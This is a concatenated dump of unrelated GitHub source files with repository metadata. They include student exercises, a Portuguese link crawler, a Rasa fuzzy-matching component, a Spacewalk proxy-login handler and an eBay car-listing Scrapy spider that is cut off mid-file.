(yes/no) \")\n\tif (returnC == \"yes\"):\n\t\tcount()\n\telse: \n\t\tinput(\"Press ENTER to return to the main screen\")\n\t\treturn\n\n","repo_name":"jppriet0/CAAP-CS","sub_path":"hw1/coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31098553381","text":"#!/usr/bin/env python3\r\n\r\nimport argparse\r\nimport sys\r\nfrom banner.Banner import banner\r\nimport useragent\r\n\r\n#Cores\r\nR = '\\033[31m' # Vermelho\r\nG = '\\033[32m' # Verde\r\nEND = '\\033[0m'\r\n\r\ndef error(msg):\r\n print(f'{R}[-] ERRO: {msg}{END}')\r\n sys.exit(1)\r\n\r\ntry:\r\n import requests\r\nexcept:\r\n print(\"É preciso instalar a biblioteca requests\")\r\n print()\r\n print(\"pip3 install requests\")\r\n sys.exit()\r\n\r\ntry:\r\n from bs4 import BeautifulSoup\r\nexcept:\r\n print(\"É preciso instalar a biblioteca beautifulsoup\")\r\n print()\r\n print(\"pip install beautifulsoup4\")\r\n sys.exit()\r\n\r\nfora = set()\r\nnoescopo = set()\r\nverifica = set()\r\n\r\n# Função que verifica arquivos no site\r\n# Usado para verificar o robots.txt\r\ndef verifica_arquivo(url,file,silent=0):\r\n r = requests.get(f'{url}/{file}', headers=headers)\r\n if r.status_code == 200:\r\n if silent == 0:\r\n print(f'{G}[+] {file} existe{END}')\r\n print(f'[*] Conteúdo de {file}:')\r\n print()\r\n print(r.text)\r\n else:\r\n print(f'[*] Conteúdo de {file}:')\r\n print(r.text)\r\n\r\n else:\r\n print(f'{R}[-] {file} não existe{END}')\r\n\r\n# Função que busca links presentes na página\r\ndef pega_links(url):\r\n r = requests.get(url, headers=headers)\r\n content = r.text\r\n \r\n soup = BeautifulSoup(content, 'html.parser')\r\n all_links = soup.find_all('a')\r\n\r\n links = set()\r\n for link in all_links:\r\n if \"http\" in link.get(\"href\"):\r\n links.add(link.get(\"href\"))\r\n else:\r\n links.add(f'{url}/{link.get(\"href\")}')\r\n\r\n return links\r\n\r\n# Função que verifica se os links encontrados estão dentro do escopo\r\ndef verifica_links(links):\r\n for i in links:\r\n if i in noescopo:\r\n continue\r\n\r\n if args.target not in i:\r\n fora.add(i)\r\n continue\r\n\r\n noescopo.add(i)\r\n print(i)\r\n\r\n# Menu de ajuda\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-q', '--quiet',\r\n action='store_true',\r\n dest='quiet',\r\n help='Suppress Output'\r\n )\r\nparser.add_argument('target',\r\n help='Target url'\r\n )\r\nparser.add_argument('-d',\r\n dest='deep',\r\n help='Deeping level for crawler (default: 0)'\r\n )\r\nparser.add_argument('--random-agent',\r\n action='store_true',\r\n dest='random_agent',\r\n help='Random user agent for requests (default: CrawAu)'\r\n )\r\nparser.add_argument('-o', \r\n dest='file_name',\r\n help='File to save the result'\r\n )\r\nparser.add_argument('--no-robots',\r\n action='store_true',\r\n dest='norobots',\r\n help='Not look for robots.txt (default: no)'\r\n )\r\nparser.add_argument('--header',\r\n dest='header',\r\n help='header key:value (Ex: \"Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l\")'\r\n ) \r\nargs = parser.parse_args()\r\n\r\nfile = args.file_name\r\ndeep = args.deep\r\n\r\nif \"http\" not in args.target:\r\n url = f'http://{args.target}'\r\nelse:\r\n url = args.target\r\n\r\nif not args.header:\r\n if not args.random_agent:\r\n headers = {'User-Agent': 'CrawAu'}\r\n else:\r\n headers = {'User-Agent': useragent.random}\r\nelse:\r\n h = args.header.split(\":\")\r\n if not args.random_agent:\r\n headers = {'User-Agent': 
'CrawAu', h[0]: h[1].lstrip()}\r\n else:\r\n headers = {'User-Agent': useragent.random, h[0]: h[1].lstrip()}\r\n\r\ntry:\r\n r = requests.get(url, headers=headers)\r\nexcept:\r\n error(f'Não é possível se conectar a {args.target}') \r\n\r\nif not args.quiet:\r\n print(banner.banner)\r\n print()\r\n if args.header:\r\n print(f'[*] Headers: {args.header}')\r\n if args.random_agent:\r\n print(f'[*] User-Agent: {useragent.random}')\r\n print(f'[*] Conectando a {args.target}')\r\n print(f'{G}[+] Status Code {r.status_code}{END}')\r\n try:\r\n servidor = r.headers['Server']\r\n print(f\"{G}[+] Servidor: {servidor}{END}\")\r\n except:\r\n pass\r\n if not args.norobots:\r\n print('[*] Verificando robots.txt')\r\n verifica_arquivo(url,\"robots.txt\")\r\n print()\r\n print('[*] Extraindo links presentes na página')\r\nelse:\r\n if not args.norobots:\r\n verifica_arquivo(url,\"robots.txt\",1)\r\n\r\nif not deep:\r\n links = pega_links(url)\r\n print()\r\n verifica_links(links)\r\nelse:\r\n if not args.quiet:\r\n print(f'[*] Profundidade {deep}')\r\n print() \r\n \r\n links = pega_links(url)\r\n verifica_links(links)\r\n \r\n # Loop responsável por entrar nos links e buscar novos links\r\n for n in range(0,int(deep)):\r\n novo = noescopo - verifica\r\n verifica = noescopo.copy()\r\n for i in novo:\r\n links = pega_links(i)\r\n verifica_links(links)\r\n\r\nif len(noescopo) == 0:\r\n print(f\"{R}[-] Nada encontrado!{END}\")\r\n\r\n# Retorna os links que aparentemente estão fora do escopo\r\n# Necessário para validar se realmente está fora do escopo\r\nif not args.quiet:\r\n print()\r\n print(\"[*] Encontrados mas possivelmente fora do escopo:\")\r\n print()\r\n print(*fora, sep='\\n')\r\n print()\r\n\r\n# Salva os links do escopo em um arquivo\r\nif args.file_name:\r\n with open(file, 'w') as arquivo:\r\n for l in noescopo:\r\n arquivo.write(l+'\\n')\r\n","repo_name":"SQU4NCH/CrawAu","sub_path":"crawau.py","file_name":"crawau.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"12817372557","text":"import sys\nfrom itertools import combinations\n\n\ndef solve():\n global empties, ans\n\n empty_coords = list(combinations(empties, 3))\n\n for coords in empty_coords:\n arrange(coords)\n if can_hide():\n ans = 'YES'\n return\n de_arrange(coords)\n\n\ndef can_hide():\n global board, teachers, ds\n\n def valid(x, y):\n global n\n return 0 <= x < n and 0 <= y < n\n\n for tx, ty in teachers:\n for dx, dy in ds:\n nx, ny = tx, ty\n\n while True:\n nx, ny = nx+dx, ny+dy\n\n if not valid(nx, ny):\n break\n\n if board[nx][ny] == 'O' or board[nx][ny] == 'T':\n break\n\n if board[nx][ny] == 'S':\n return False\n\n return True\n\n\ndef arrange(coords):\n global board\n for x, y in coords:\n board[x][y] = 'O'\n\n\ndef de_arrange(coords):\n global board\n for x, y in coords:\n board[x][y] = 'X'\n\n\ndef find_points():\n global board, n, teachers, empties\n\n teachers = []\n for i in range(n):\n for j in range(n):\n if board[i][j] == 'T':\n teachers.append([i, j])\n elif board[i][j] == 'X':\n empties.append([i, j])\n\n return teachers\n\n\nds = [[-1, 0], [1, 0], [0, -1], [0, 1]]\nn = int(sys.stdin.readline().strip())\nboard = []\nfor _ in range(n):\n board.append(list(sys.stdin.readline().strip().split(' ')))\n\nteachers = []\nempties = []\nfind_points()\nans = \"NO\"\nsolve()\nprint(ans)\n\n\n# 5\n# X X X X X\n# X X X X X\n# X X T X X\n# X X X X X\n# X X X S 
X","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/brute_force/18428.감시 피하기.py","file_name":"18428.감시 피하기.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"14100023561","text":"#análise de nota e média\n\nnota1 = float(input('Digite a primeira nota: '))\nnota2 = float(input('Digite a segunda nota: '))\nmedia = (nota1 + nota2) / 2\nif media < 5.0:\n print('Média {} - REPROVADO'.format(media))\nelif media >= 5.0 and media <= 6.9: #outra forma de escrever o código: 7 > media >= 5\n print('Média {} - RECUPERAÇÃO'.format(media))\nelse:\n print('Média {} - APROVADO'.format(media))","repo_name":"tabatagloria/curso_video_Python","sub_path":"Mundo_2-Estruturas_de_Controle/desafio_40.py","file_name":"desafio_40.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19162267401","text":"import xgboost as xgb\nimport matplotlib.pyplot as plt\n\ndtrain = xgb.DMatrix(\"../data/agaricus.txt.train\")\ndtest = xgb.DMatrix(\"../data/agaricus.txt.test\")\n'''\nmax_depth: 树的最大深度。缺省值为6,取值范围为:[1,∞]\neta:为了防止过拟合,更新过程中用到的收缩步长。在每次提升计算之后,算法会直接获得新特征的权重。 \neta通过缩减特征的权重使提升计算过程更加保守。缺省值为0.3,取值范围为:[0,1]\nsilent:取0时表示打印出运行时信息,取1时表示以缄默方式运行,不打印运行时信息。缺省值为0\nobjective: 定义学习任务及相应的学习目标,“binary:logistic” 表示二分类的逻辑回归问题,输出为概率。\n'''\nparam = {'max_depth': 2, 'eta': 1, 'silent': 1, 'objective': 'binary:logistic'}\nparam['eval_metric'] = 'auc'\n\n# 设置boosting迭代计算次数\nnum_round = 10\nevallist = [(dtest, 'eval'), (dtrain, 'train')]\nbst = xgb.train(param, dtrain, num_round, evallist)\npreds = bst.predict(dtest)\nprint(preds)\nlabels = dtest.get_label()\nprint('error=%f' % (sum(1 for i in range(len(preds)) if int(preds[i] > 0.5) != labels[i]) / float(len(preds))))\n# ax=xgb.plot_importance(bst)\n# plt.show()\n# ax=xgb.plot_tree(bst, num_trees=2)\n# plt.show()\n","repo_name":"zzqcst/python-practice","sub_path":"src/xgboostdemo.py","file_name":"xgboostdemo.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5814759177","text":"class Solution(object):\n def complexNumberMultiply(self, a, b):\n \"\"\"\n :type a: str\n :type b: str\n :rtype: str\n \"\"\"\n a = a.split('+')\n b = b.split('+')\n first = int(a[0]) * int(b[0]) - int(a[1][:-1]) * int(b[1][:-1])\n second = int(a[0]) * int(b[1][:-1]) + int(b[0]) * int(a[1][:-1])\n return str(first) + '+' + str(second) + 'i'\n","repo_name":"shaniavina/Leetcode_Python","sub_path":"complex_number_multiplication.py","file_name":"complex_number_multiplication.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9519631619","text":"import os\nimport typing\nfrom typing import Any, Dict, List, Optional, Text, Type\n\nimport rasa.shared.utils.io\nfrom fuzzywuzzy import process\nfrom rasa.nlu.components import Component\nfrom rasa.nlu.config import RasaNLUModelConfig\nfrom rasa.nlu.extractors.extractor import EntityExtractor\nfrom rasa.nlu.utils import write_json_to_file\nfrom rasa.shared.nlu.constants import ENTITIES\nfrom rasa.shared.nlu.training_data.message import Message\nfrom rasa.shared.nlu.training_data.training_data import TrainingData\n\nif typing.TYPE_CHECKING:\n from rasa.nlu.model import Metadata\n\n# subclass EntityExtractor to skip featurize_message() in 
rasa.nlu.model.Interpreter\nclass EntityTypoFixer(EntityExtractor):\n    \"\"\"Fixes typos in extracted entity values by fuzzy matching against known entities.\"\"\"\n\n    # Which components are required by this component.\n    # Listed components should appear before the component itself in the pipeline.\n    @classmethod\n    def required_components(cls) -> List[Type[Component]]:\n        \"\"\"Specify which components need to be present in the pipeline.\"\"\"\n\n        return [EntityExtractor]\n\n    # Defines the default configuration parameters of a component\n    # these values can be overwritten in the pipeline configuration\n    # of the model. The component should choose sensible defaults\n    # and should be able to create reasonable results with the defaults.\n    defaults = {\"score_cutoff\": 80}\n\n    # Defines what language(s) this component can handle.\n    # This attribute is designed for instance method: `can_handle_language`.\n    # Default value is None which means it can handle all languages.\n    # This is an important feature for backwards compatibility of components.\n    supported_language_list = None\n\n    # Defines what language(s) this component can NOT handle.\n    # This attribute is designed for instance method: `can_handle_language`.\n    # Default value is None which means it can handle all languages.\n    # This is an important feature for backwards compatibility of components.\n    not_supported_language_list = None\n\n    def __init__(\n        self,\n        component_config: Optional[Dict[Text, Any]] = None,\n        entities: Optional[List[Text]] = None,\n    ) -> None:\n        super().__init__(component_config)\n        self.entities = entities if entities else []\n        self.score_cutoff = component_config.get(\n            \"score_cutoff\", self.defaults[\"score_cutoff\"]\n        )\n\n    def train(\n        self,\n        training_data: TrainingData,\n        config: Optional[RasaNLUModelConfig] = None,\n        **kwargs: Any,\n    ) -> None:\n        \"\"\"Train this component.\n\n        This is the component's chance to train itself provided\n        with the training data. The component can rely on\n        any context attribute to be present, that gets created\n        by a call to :meth:`components.Component.pipeline_init`\n        of ANY component and\n        on any context attributes created by a call to\n        :meth:`components.Component.train`\n        of components previous to this one.\"\"\"\n        self.entities = list(training_data.entity_synonyms.keys())\n\n    def process(self, message: Message, **kwargs: Any) -> None:\n        \"\"\"Process an incoming message.\n\n        This is the component's chance to process an incoming\n        message. 
The component can rely on\n any context attribute to be present, that gets created\n by a call to :meth:`components.Component.pipeline_init`\n of ANY component and\n on any context attributes created by a call to\n :meth:`components.Component.process`\n of components previous to this one.\"\"\"\n extracted_entities = message.get(ENTITIES, [])\n self.fix_entity_typo(extracted_entities)\n message.set(ENTITIES, extracted_entities, add_to_output=True)\n\n def persist(self, file_name: Text, model_dir: Text) -> Optional[Dict[Text, Any]]:\n \"\"\"Persist this component to disk for future loading.\"\"\"\n\n if self.entities:\n file_name = file_name + \".json\"\n entity_file = os.path.join(model_dir, file_name)\n write_json_to_file(entity_file, self.entities)\n\n return {\"file\": file_name}\n else:\n return {\"file\": None}\n\n def fix_entity_typo(self, entities: List[Dict[Text, Any]]) -> None:\n for entity in entities:\n entity_value = str(entity[\"value\"])\n fuzzy_match = process.extractOne(\n entity_value, self.entities, score_cutoff=self.score_cutoff\n )\n if fuzzy_match:\n fuzzy_entity = fuzzy_match[0]\n if fuzzy_entity != entity_value:\n entity[\"value\"] = fuzzy_entity\n self.add_processor_name(entity)\n\n def add_processor_name(self, entity: Dict[Text, Any]) -> Dict[Text, Any]:\n if \"processors\" in entity:\n entity[\"processors\"].append(self.name)\n else:\n entity[\"processors\"] = [self.name]\n\n return entity\n\n @classmethod\n def load(\n cls,\n meta: Dict[Text, Any],\n model_dir: Text,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n \"\"\"Load this component from file.\"\"\"\n\n file_name = meta.get(\"file\")\n if not file_name:\n entities = None\n return cls(meta, entities)\n\n entities_file = os.path.join(model_dir, file_name)\n if os.path.isfile(entities_file):\n entities = rasa.shared.utils.io.read_json_file(entities_file)\n else:\n entities = None\n return cls(meta, entities)\n","repo_name":"hsm207/rasa_fuzzy","sub_path":"addons/my_custom_components.py","file_name":"my_custom_components.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37818937243","text":"import time\n\n# common module imports\nfrom spacewalk.common import CFG, rhnFault, rhnFlags, log_debug, log_error, UserDictCase\nfrom spacewalk.common.rhnTranslate import _\n\n# local module imports\nfrom spacewalk.server.rhnLib import computeSignature\nfrom spacewalk.server.rhnHandler import rhnHandler\nfrom spacewalk.server import rhnServer, rhnSQL, apacheAuth, rhnPackage\n\n# a class that provides additional authentication support for the\n# proxy functions\nclass rhnProxyHandler(rhnHandler):\n def __init__(self):\n rhnHandler.__init__(self)\n\n def auth_system(self, system_id):\n \"\"\" System authentication. We override the standard function because\n we need to check additionally if this system_id is entitled for\n proxy functionality.\n \"\"\"\n log_debug(3) \n server = rhnHandler.auth_system(self, system_id)\n # if it did not blow up, we have a valid server. 
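# fix_entity_typo above delegates to fuzzywuzzy's process.extractOne with a score
# cutoff; the core idea in isolation (requires the fuzzywuzzy package):
from fuzzywuzzy import process

def fix_typo(value, vocabulary, score_cutoff=80):
    match = process.extractOne(value, vocabulary, score_cutoff=score_cutoff)
    # extractOne returns a (choice, score) tuple, or None below the cutoff
    return match[0] if match else value

# e.g. fix_typo("new yrok", ["new york", "boston"]) should return "new york"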
Check proxy\n # entitlement.\n # XXX: this needs to be moved out of the rhnServer module,\n # possibly in here\n h = rhnSQL.prepare(\"\"\"\n select 1\n from rhnProxyInfo pi\n where pi.server_id = :server_id\n \"\"\")\n h.execute(server_id = self.server_id)\n row = h.fetchone_dict()\n if not row:\n # we require entitlement for this functionality\n log_error(\"Server not entitled for Proxy\", self.server_id)\n raise rhnFault(1002, _(\n 'RHN Proxy service not enabled for server profile: \"%s\"')\n % server.server[\"name\"])\n # we're fine...\n return server\n\n def auth_client(self, token):\n \"\"\" Authenticate a system based on the same authentication tokens\n the client is sending for GET requests\n \"\"\"\n log_debug(3)\n # Build a UserDictCase out of the token\n dict = UserDictCase(token)\n # Set rhnFlags so that we can piggyback on apacheAuth's auth_client\n rhnFlags.set('AUTH_SESSION_TOKEN', dict)\n\n # XXX To clean up apacheAuth.auth_client's logging, this is not about\n # GET requests\n result = apacheAuth.auth_client()\n\n if not result:\n raise rhnFault(33, _(\"Invalid session key\"))\n\n log_debug(4, \"Client auth OK\")\n # We checked it already, so we're sure it's there\n client_id = dict['X-RHN-Server-Id']\n \n server = rhnServer.search(client_id)\n if not server:\n raise rhnFault(8, _(\"This server ID no longer exists\"))\n # XXX: should we check if the username still has access to it? \n # probably not, because there is no known good way we can\n # update the server system_id on the client side when\n # permissions change... Damn it. --gafton\n self.server = server\n self.server_id = client_id\n self.user = dict['X-RHN-Auth-User-Id']\n return server\n\n \nclass Proxy(rhnProxyHandler):\n \"\"\" this is the XML-RPC receiver for proxy calls \"\"\"\n def __init__(self):\n log_debug(3)\n rhnProxyHandler.__init__(self)\n self.functions.append('package_source_in_channel')\n self.functions.append('login')\n\n def package_source_in_channel(self, package, channel, auth_token):\n \"\"\" Validates the client request for a source package download \"\"\"\n log_debug(3, package, channel)\n server = self.auth_client(auth_token)\n return rhnPackage.package_source_in_channel(self.server_id, \n package, channel)\n\n def login(self, system_id):\n \"\"\" Login routine for the proxy\n\n Return a formatted string of session token information as regards\n an RHN Proxy. Also sets this information in the headers.\n\n NOTE: design description for the auth token format and how it is\n is used is well documented in the proxy/broker/rhnProxyAuth.py\n code.\n \"\"\"\n log_debug(5, system_id)\n # Authenticate. 
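# computeSignature() is imported from rhnLib and not shown here; a typical way to
# sign a colon-joined token like the one described above -- purely an illustrative
# sketch, not Spacewalk's actual implementation -- is an HMAC over the fields:
import hashlib
import hmac

def sign_fields(secret, *fields):
    message = ':'.join(str(f) for f in fields).encode('utf-8')
    return hmac.new(secret.encode('utf-8'), message, hashlib.sha256).hexdigest()

# token = '%s:%s:%s:%s:%s' % (server_id, user, now, expire,
#                             sign_fields(secret, server_id, user, now, expire))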
We need the user record to be able to generate\n # auth tokens\n self.load_user = 1 \n self.auth_system(system_id)\n # log the entry\n log_debug(1, self.server_id)\n rhnServerTime = str(time.time())\n expireOffset = str(CFG.PROXY_AUTH_TIMEOUT)\n signature = computeSignature(CFG.SECRET_KEY, self.server_id, self.user,\n rhnServerTime, expireOffset)\n \n token = '%s:%s:%s:%s:%s' % (self.server_id, self.user, rhnServerTime,\n expireOffset, signature)\n\n # NOTE: for RHN Proxies of version 3.1+ tokens are passed up in a\n # multi-valued header with HOSTNAME tagged onto the end of the\n # token, so, it looks something like this:\n # x-rhn-proxy-auth: 'TOKEN1:HOSTNAME1,TOKEN2:HOSTNAME2'\n # This note is only that -- a \"heads up\" -- in case anyone gets\n # confused.\n\n # Push this value into the headers so that the proxy can\n # intercept and cache it without parsing the xmlrpc.\n transport = rhnFlags.get('outputTransportOptions')\n transport['X-RHN-Action'] = 'login'\n transport['X-RHN-Proxy-Auth'] = token\n return token\n\n\n#-----------------------------------------------------------------------------\n\n","repo_name":"colloquium/spacewalk","sub_path":"backend/server/handlers/xmlrpc/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36227032911","text":"# Standard library\nimport random\nimport pandas as pd\n\n# Third-party libraries\nfrom matplotlib import pyplot as plt\nfrom matplotlib.cm import Dark2\n#https://matplotlib.org/stable/tutorials/colors/colormaps.html\n\n# Custom modules\nfrom thread_plot import thread_plot\n\n\n\ndf=pd.read_csv('cluster_ids_jaccard_exp0_k3_simulated_set6_seed1.csv')\nprint(df.head())\n\ndf_clust0=df.loc[df['cluster']==0]\nprint(len(df_clust0))\n\nchoice=list(df_clust0['String'].unique())\nchoices=''.join(choice)\n#print(choices)\n\nchoices2=[]\n\nfor i in choices:\n if i not in set(choices2):\n choices2.append(i)\n\nchoices3=''.join(choices2)\nprint(choices3)\n\nif __name__ == '__main__':\n choices = choices3\n data = list(df_clust0['String'])\n\n # We need to make a color choice for each letter in the sequence\n cm = plt.get_cmap('tab20')\n colors = dict([(choices[i], cm(1.*i/len(choices))) for i in range(len(choices))])\n\n # Make the plot\n fig, ax = plt.subplots(1)\n thread_plot(ax, colors, data)\n\n # Since we're using patches (rectangles), Matplotlib doesn't know about our legend, so we have\n # to generate some fake data to force the legend to appear properly\n markers = [plt.Line2D([0,0],[0,0],color=color, marker='o', linestyle='') for color in colors.values()]\n plt.legend(markers, colors.keys(), numpoints=1, bbox_to_anchor=(1.05, 1))\n plt.tight_layout()\n\n plt.show()\n\n","repo_name":"laurenleesc/thread_plot","sub_path":"demo_realdata.py","file_name":"demo_realdata.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"4857810510","text":"class Solution:\n def employeeFreeTime(self, schedule):\n\n arr = []\n for employee in schedule:\n arr += [interval for interval in employee]\n\n arr.sort(key=lambda x: x.start)\n\n free_time = []\n\n end = arr[0].end\n\n for i in range(1, len(arr)):\n\n if end < arr[i].start:\n free_time.append(Interval(end, arr[i].start))\n end = arr[i].end\n\n elif arr[i].end > end:\n end = arr[i].end\n\n return 
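# The order-preserving de-duplication loop above (choices2) can be written with
# dict.fromkeys, which keeps first-seen order on Python 3.7+:
def unique_chars(s):
    return ''.join(dict.fromkeys(s))

# unique_chars('abcabd') -> 'abcd'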
free_time","repo_name":"sindhura-pv/programming-practice","sub_path":"heap/hard/employee-free-time.py","file_name":"employee-free-time.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18412811875","text":"# import scrapy\n\n\n# class EbaySpiderSpider(scrapy.Spider):\n# name = 'ebay_spider'\n# allowed_domains = ['example.com']\n# start_urls = ['http://example.com/']\n\n# def parse(self, response):\n# pass\n\n\nfrom scrapy.crawler import CrawlerProcess\nimport scrapy\nimport json\nfrom scrapy.http import FormRequest\nfrom scrapy.http.headers import Headers\nfrom urllib.parse import urlencode\nfrom scrapy import Request\nfrom scrapy.http.cookies import CookieJar\nfrom scrapy.shell import inspect_response\n# from urlparse import urlparse, parse_qs\nfrom urllib.parse import urlparse, parse_qs\nimport math\n\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom twisted.internet.error import DNSLookupError\nfrom twisted.internet.error import TimeoutError, TCPTimedOutError\n\nclass BlogSpider(scrapy.Spider):\n COOKIES_ENABLED = True\n COOKIES_DEBUG = False\n name = 'ebay_spider'\n # start_urls = ['http://www.ebay.com/sch/Cars-Trucks/6001/i.html']\n start_urls = [\n 'http://www.ebay.com/sch/Cars-Trucks/6001/i.html?_dcat=6001&_dmpt=US_Cars_Trucks&Model%2520Year=1901%7C1902%7C1903%7C1904%7C1905%7C1906%7C1907%7C1908%7C1909%7C1910%7C1911%7C1912%7C1913%7C1914%7C1915%7C1916%7C1917%7C1918%7C1919%7C1920%7C1921%7C1922%7C1923%7C1924%7C1925%7C1926%7C1927%7C1928%7C1929%7C1930%7C1931%7C1932%7C1933%7C1934%7C1935%7C1936%7C1937%7C1938%7C1939%7C1940%7C1941%7C1942%7C1943%7C1944%7C1945%7C1946%7C1947%7C1948%7C1949%7C1950%7C1951%7C1952%7C1953%7C1954%7C1955%7C1956%7C1957%7C1958%7C1959%7C1960%7C1961%7C1962%7C1963%7C1964%7C1965%7C1966%7C1967%7C1968%7C1969%7C1970%7C1971%7C1972%7C1973%7C1974%7C1975%7C1976%7C1977%7C1978%7C1979%7C1980%7C1981%7C1982%7C1983%7C1984%7C1985%7C1986%7C1987']\n\n def __init__(self, brand=None, model=None, start_year=None, end_year=None, start_price=None, end_price=None,\n mileage=None, interior=None, exterior=None, page_number=None, *args, **kwargs):\n\n f = open(\"./ebay_params.txt\", \"w\")\n qs = \"brand={brand}, model={model}, start_year={start_year}, end_year={end_year}, \" \\\n \"start_price={start_price}, end_price={end_price}, mileage={mileage}, \" \\\n \"interior={interior}, exterior={exterior}, page_number={page_number}\" \\\n .format(brand=brand, model=model, start_year=start_year, end_year=end_year,\n start_price=start_price, end_price=end_price, mileage=mileage,\n interior=interior, exterior=exterior, page_number=page_number)\n\n self.f = open(\"./ebay_debugger.txt\", \"a\")\n super(BlogSpider, self).__init__(*args, **kwargs)\n year = \"\"\n try:\n if start_year and end_year:\n for i in range(int(start_year), int(end_year) + 1, 1):\n if i == int(end_year):\n year = year + str(i)\n else:\n year = year + str(i) + '%7C'\n elif start_year and not end_year:\n year = start_year\n elif end_year and not start_year:\n year = end_year\n self.f.write('Start.')\n if mileage:\n mileage = mileage.replace(',', '%252C')\n # url= 'http://www.ebay.com/sch/Cars-Trucks/6001/i.html?rt=nc&LH_BIN=1&_dcat=6001&_dmpt=US_Cars_Trucks&makeval='+brand+'&modelval='+model+'&_nkw='+brand+' 
'+model+'&Model%2520Year='+year+'&rt=nc&_mPrRngCbx=1&_udlo='+start_price+'&_udhi='+end_price+'&Vehicle%2520Mileage=Less%2520than%2520'+mileage+'%2520miles'+'&Exterior%2520Color='+exterior+'&Interior%2520Color='+interior+'&_pgn='+page_number+'&_ipg=50'\n url = 'http://www.ebay.com/sch/Cars-Trucks/6001/i.html?_dcat=6001&_dmpt=US_Cars_Trucks&makeval=' + brand + '&modelval=' + model + '&_nkw=' + brand + ' ' + model + '&Model%2520Year=' + year + '&rt=nc&_mPrRngCbx=1&_udlo=' + start_price + '&_udhi=' + end_price + '&Vehicle%2520Mileage=Less%2520than%2520' + mileage + '%2520miles' + '&Exterior%2520Color=' + exterior + '&Interior%2520Color=' + interior + '&_pgn=' + page_number + '&_ipg=50'\n\n # url = 'https://www.ebay.com/sch/Cars-Trucks/6001/i.html?_dcat=6001&_dmpt=US_Cars_Trucks&' \\\n # 'makeval={make}&_fosrp=1'.format(make=brand)\n\n\n # self.start_urls = ['http://www.example.com/categories/%s' % category]\n f.write(\"%s \\n %s\" % (qs, url))\n self.start_urls = [url]\n except Exception as e:\n f = open(\"./ebay_exception1.txt\", \"w\")\n f.write(str(e))\n\n def start_requests(self):\n for u in self.start_urls:\n yield scrapy.Request(u, callback=self.parse,\n errback=self.errback_httpbin,\n dont_filter=True)\n\n def errback_httpbin(self, failure):\n f = open(\"./ebay_httpfail.txt\", \"w\")\n # f.write(repr(failure))\n output = \"URL: {url} \\n failure: {failure}\".format(url=self.start_urls[0], failure=repr(failure))\n\n if failure.check(HttpError):\n output += 'HttpError occurred'\n\n elif failure.check(DNSLookupError):\n output += 'DNSLookupError occurred'\n\n elif failure.check(TimeoutError, TCPTimedOutError):\n output += 'TimeoutError occurred'\n output += \"\\n statusCode: {status}\".format(status=failure.value.response.status )\n f.write(output)\n\n def parse(self, response):\n try:\n global total_results\n global page_count\n self.f.write('Step 1')\n #\tinspect_response(response,self)\n self.f.write(response.body)\n #self.f.write(response.__dict__)\n if response.css('span.listingscnt ::text'):\n self.f.write('Step 2')\n total_results = response.css('span.listingscnt ::text').extract_first()\n total_results = total_results.replace(\",\", \"\")\n total_results = total_results.replace(\"listings\", \"\")\n total_results = total_results.strip()\n pages = float(total_results) / 50\n page_count = math.ceil(pages)\n self.logger.warning(total_results + \" resultats\")\n elif response.css('span.rcnt ::text'):\n self.f.write('Step 3')\n total_results = response.css('span.rcnt ::text').extract_first()\n total_results = total_results.replace(\",\", \"\")\n total_results = total_results.replace(\"listings\", \"\")\n total_results = total_results.strip()\n pages = float(total_results) / 50\n page_count = math.ceil(pages)\n self.logger.warning(total_results + \" resultats\")\n elif response.css('h1.srp-controls__count-heading ::text'):\n self.f.write('Step 4')\n total_results = response.css('h1.srp-controls__count-heading ::text').extract_first()\n total_results = total_results.replace(\",\", \"\")\n total_results = total_results.replace(\" results\", \"\")\n total_results = total_results.strip()\n pages = float(total_results) / 50\n page_count = math.ceil(pages)\n self.logger.warning(total_results + \" resultats\")\n\n else:\n self.f.write('Step 5')\n self.logger.warning(\"absence de span.listingscnt et span.rcnt\")\n total_results = ''\n page_count = ''\n\n for res in response.css('li.sresult.lvresult.clearfix.li'):\n if res.css('ul.lvprices li:nth-child(2).lvformat span ::text'):\n bids = 
